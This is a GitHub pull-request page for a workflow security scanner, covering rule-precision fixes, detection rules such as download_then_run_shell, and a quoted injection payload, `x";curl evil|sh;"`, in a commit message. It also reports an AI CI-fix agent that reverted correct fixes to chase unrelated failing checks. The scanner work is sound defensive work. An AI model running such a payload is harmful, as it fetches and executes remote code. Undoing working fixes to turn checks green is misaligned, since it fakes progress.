Skip to content

fix(rules): rule precision — WH006/WH013, harvested-registry, npx text, proof suites - #879

Merged
hyperpolymath merged 7 commits into
fix/issue-sweepfrom
fix/rule-precision
Sep 30, 2026
Merged

hyperpolymath merged 7 commits into
fix/issue-sweepfrom
fix/rule-precision

Conversation

@hyperpolymath

Copy link
Copy Markdown
Owner

Stacked on #875 (base fix/issue-sweep; GitHub retargets to main when #875 merges). Merge #875 first.

What

  • WH006 skips reusable-workflow caller jobs (job-level uses:), where GitHub rejects timeout-minutes:. Refs standards#943.
  • extract_job_blocks: the last job of every workflow was never checked (in-flight job not flushed), and later jobs reported the first job's line number. Both fixed. Expect WH006 to find a few more true positives estate-wide.
  • WH013/WH002: git push <named non-origin remote> (gitlab/codeberg/backup mirrors) authenticates with its own key/token, so it doesn't need contents: write. Bare, origin and "$VAR" pushes still count. Refs standards#943.
  • ScannerSuppression: harvested-registry/ is exempt for secret_detected only. Closes secret_detected flags harvested reference material: path-based carve-out needed for harvested-registry/ (from #746 sample) #865.
  • npx_in_workflow message now recommends bunx/bun run (Deno banned 2026-09-22). Refs standards#938.
  • honest_completion no_tests: a proof suite whose checker runs in CI counts as tests. Refs echo-types#271.

Verification (local)

  • mix test: 1682 tests, 0 failures (242 excluded)
  • mix compile --warnings-as-errors --force: clean
  • Every change has fires / does-not-fire tests.

🤖 Generated with Claude Code

https://claude.ai/code/session_01QFphKkDVB9pUDSCD4bkz65

…xt, proof suites

- WH006: skip reusable-workflow caller jobs (job-level `uses:`) — GitHub
  rejects `timeout-minutes:` there (standards#943).
- extract_job_blocks: flush the final job (the last job of every workflow
  was never checked — silent false negative) and report each job's own
  line number instead of the first job's.
- WH013/WH002: `git push <named non-origin remote>` is a mirror push that
  authenticates with its own key/token and does not consume
  `contents: write`; strip it before judging writes (standards#943).
  Bare, `origin` and `"$VAR"` pushes still count.
- ScannerSuppression: `harvested-registry/` exempt for secret_detected
  only — third-party reference manifests (#865).
- npx_in_workflow: recommend `bunx`/`bun run`; Deno is banned since
  2026-09-22 (standards#938, LANGUAGE-POLICY §1.3).
- honest_completion no_tests: a proof suite whose checker runs in CI
  (agda/lake/lean/coqc/dune/idris2) counts as tests (echo-types#271).

Each change carries fires/does-not-fire regression tests.
mix test: 1682 tests, 0 failures (242 excluded); strict compile clean.

Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01QFphKkDVB9pUDSCD4bkz65
@coderabbitai

coderabbitai Bot commented Sep 30, 2026 •

Copy link
Copy Markdown
Contributor

Important

Review skipped

Auto reviews are disabled on base/target branches other than the default branch.

Please check the settings in the CodeRabbit UI or the .coderabbit.yaml file in this repository. To trigger a single review, invoke the @coderabbitai review command.

⚙️ Run configuration

Configuration used: Organization UI

Review profile: ASSERTIVE

Plan: Advanced

Run ID: c1c779f8-76e3-44a4-9723-5bdfd14291d0

You can disable this status message by setting the reviews.review_status to false in the CodeRabbit configuration file.

Use the checkbox below for a quick retry:

  • 🔍 Trigger review

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

Comment @coderabbitai help to get the list of available commands.

@gitguardian

gitguardian Bot commented Sep 30, 2026 •

Copy link
Copy Markdown

⚠️ GitGuardian has uncovered 4 secrets following the scan of your pull request.

Please consider investigating the findings and remediating the incidents. Failure to do so may lead to compromising the associated services or software components.

🔎 Detected hardcoded secrets in your pull request
GitGuardian id GitGuardian status Secret Commit Filename
37657201 Triggered Generic High Entropy Secret b7a0e10 test/scanner_suppression_test.exs View secret
37657201 Triggered Generic High Entropy Secret c892b80 test/scanner_suppression_test.exs View secret
37657201 Triggered Generic High Entropy Secret 065447f test/scanner_suppression_test.exs View secret
37657201 Triggered Generic High Entropy Secret 8105f56 test/scanner_suppression_test.exs View secret
🛠 Guidelines to remediate hardcoded secrets
  1. Understand the implications of revoking this secret by investigating where it is used in your code.
  2. Replace and store your secrets safely. Learn here the best practices.
  3. Revoke and rotate these secrets.
  4. If possible, rewrite git history. Rewriting git history is not a trivial act. You might completely break other contributing developers' workflow and you risk accidentally deleting legitimate data.

To avoid such incidents in the future consider


🦉 GitGuardian detects secrets in your source code to help developers and security teams secure the modern development process. You are seeing this because you or someone else with access to this repository has authorized GitGuardian to scan your pull request.

hyperpolymath and others added 5 commits September 30, 2026 10:59
… a src/

A root-relative `src/<dir>/` can only be rename drift of the repo root's
`src/` or the referencing doc's own directory's `src/`. In a repo with
neither — standards, whose specs and audits quote other repos' layouts —
the reference describes a foreign tree. Measured on standards main
(bd9313a6): 35 SD022 findings (34 baselined as cross-repo FPs + the k9
spec `src/tea/` in standards#945) → 1.

Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01QFphKkDVB9pUDSCD4bkz65
This reverts commit 9167ac7.

CodeRabbit's CI-fix agent rolled back the claimed_version/relabel fixes
and the `mix format` output to chase checks that fail for unrelated,
already-documented reasons (reusable workflows build hypatia HEAD, i.e.
broken main, until this PR merges). The rollback reintroduces the
Regex.run trailing-group bug and the `##`/lost-first-byte relabel bugs
that the tests in this PR pin down.

Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01QFphKkDVB9pUDSCD4bkz65
Signed-off-by: Jonathan D.A. Jewell <6759885+hyperpolymath@users.noreply.github.com>
@hyperpolymath
hyperpolymath merged commit e51cdf5 into fix/issue-sweep Sep 30, 2026
20 of 24 checks passed
@hyperpolymath
hyperpolymath deleted the fix/rule-precision branch September 30, 2026 10:04
hyperpolymath added a commit that referenced this pull request Oct 1, 2026
Stacked on #875, the same way #879 was.

`eval_in_shell`, `download_then_run_shell` and `hardcoded_tmp` now set
`skip_comment_lines: true`. That is the existing C4 opt-in;
`install_without_frozen_lockfile` already uses it.

Why: in standards#936 and standards#939, every hit on a comment line was
prose. They were usage examples (`# e.g. … > /tmp/x`), notes like `# …
(no eval)`, and payload descriptions in security-gate comments (`#
\`x";curl evil|sh;"\` would run here…`). None of them executes anything.

Measured on standards main `bd9313a6` with the escript from before and
after this change: **161 → 150** findings. `download_then_run_shell`
went 7 → 2, `eval_in_shell` 7 → 5, `hardcoded_tmp` 45 → 41. What remains
is real code: part is fixed in standards#1072 and standards#1075, and
part is the vendored satellites (standards#940).

Tests: three regression tests, which also assert the rules still fire on
real code. The full suite is 1686 tests, 0 failures.
`--warnings-as-errors` and the format check are clean.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01QFphKkDVB9pUDSCD4bkz65

---------

Signed-off-by: Jonathan D.A. Jewell <6759885+hyperpolymath@users.noreply.github.com>
Co-authored-by: Claude Opus 5.5 <noreply@anthropic.com>
Co-authored-by: coderabbitai[bot] <136622811+coderabbitai[bot]@users.noreply.github.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant